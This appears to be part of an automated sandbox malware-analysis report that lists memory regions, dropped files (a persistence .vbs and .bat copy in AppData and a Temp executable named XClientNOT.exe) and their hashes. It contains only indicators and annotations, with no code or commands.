memory/4536-27-0x0000025D3FC10000-0x0000025D3FC20000-memory.dmp

memory/4536-28-0x0000025D3FC10000-0x0000025D3FC20000-memory.dmp

memory/4536-29-0x0000025D3FC10000-0x0000025D3FC20000-memory.dmp

memory/4536-32-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (benign PowerShell runtime artifact)

MD5 68dc886431c7bc43c168ee2f2349dfa9
SHA1 2fd61cfdeaf52ee2ccd902ff1cc3e5c08f426ccc
SHA256 944abd73b0e4b30b22863d73594cac5fbcf4de64469d13dd1e3a3ca8cf85440e
SHA512 97c55d61e2df6d2f7a858347ad6e1cecbfc26c3b5863850092b9625e549408c053f0787ae267bfdc403907081a1458e6d39acc897c869c3460bd003a865185a6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (benign CLR runtime artifact, written whenever a .NET process such as powershell.exe starts)

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_334.vbs

MD5 24c7af433b8a5127b679964343181505
SHA1 57bedc4d405eed838f67a880fb22e9e921979589
SHA256 badbe5b3ed31eb7b68cdcf1d45a0750726410b72dddd696a9b87be41cf36a23f
SHA512 ae45c43d23d87b71bba02b28bab466cd91e767335f21e4d49b21a9705b26f9bc5b5288dbb9bc1d4a6081cbbc346bd170ab5a85613a2907dce6d816978f15f0ed

C:\Users\Admin\AppData\Roaming\startup_str_334.bat (same SHA256 as the submitted sample: the persisted copy that the scheduled task's .vbs runs is byte-identical to Client-built.bat)

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/1844-41-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/2224-42-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/2224-43-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-44-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-57-0x00000262515B0000-0x00000262518D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/3880-68-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/3880-69-0x0000000000DD0000-0x0000000000DDE000-memory.dmp

memory/2224-70-0x0000026251F00000-0x0000026251F50000-memory.dmp

memory/2224-71-0x0000026252310000-0x00000262523C2000-memory.dmp

memory/2224-72-0x00000262525A0000-0x0000026252762000-memory.dmp

memory/3880-73-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/2224-74-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/2224-75-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-76-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-77-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/3880-78-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/3880-79-0x0000000002DB0000-0x0000000002DC0000-memory.dmp